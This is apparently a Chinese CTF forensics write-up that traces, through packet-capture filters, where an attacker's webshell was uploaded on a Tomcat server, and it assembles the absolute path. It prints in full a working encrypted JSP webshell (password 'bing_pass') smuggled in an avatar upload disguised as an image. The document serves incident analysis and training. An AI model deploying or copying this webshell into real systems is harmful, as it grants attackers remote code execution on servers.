关卡5

题目描述 #

关卡描述:黑客上传的webshell绝对路径是什么?

Flag #

tcp.stream eq 51

POST /api/upload HTTP/1.1
Host: 202.1.1.66:8080

{"msg":"..................http://202.1.1.66:8080/static/s74e7vwmzs21d5x6.jsp","code":0,"url":"http://202.1.1.66:8080/static/s74e7vwmzs21d5x6.jsp"}

没有靶机的情况下,那就只能动动脑子了

tcp.stream eq 51

POST /api/upload HTTP/1.1
Host: 202.1.1.66:8080

--628c1882-2027-4c85-a009-e4cd41af99a9
Content-Disposition: form-data; name="avatar"; filename="pic.jsp"
Content-Type: image/jpeg
Content-Length: 17

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("bing_pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
--628c1882-2027-4c85-a009-e4cd41af99a9--

先找到密码了bing_pass

ip.addr == 202.1.1.66 && http.request.method == "POST" && http.request.uri contains "s74e7vwmzs21d5x6"

tcp.stream eq 76
tcp.stream eq 76 
b99f657b04941030  # 密钥

BlueTeamTools 解密Webshell流量 使用获得的密钥和密码,对webshell首次成功连接的数据包解密成功。

原始数据
86a6e613cecd45be680facdb95830327a565f74aa74d7aa9e80eaf710f0ff70868cdf542d12cd5f72f1bd …… 5363ab6626393e70ef5793c33d5a05d22c6de

CATALINA_HOME=/usr/local/tomcat
/usr/local/tomcat/webapps

通过IP:PORT这种方式可以访问,jsp写入在

/usr/local/tomcat/webapps/ROOT

拼凑一下吧

/usr/local/tomcat/webapps/ROOT/static/s74e7vwmzs21d5x6.jsp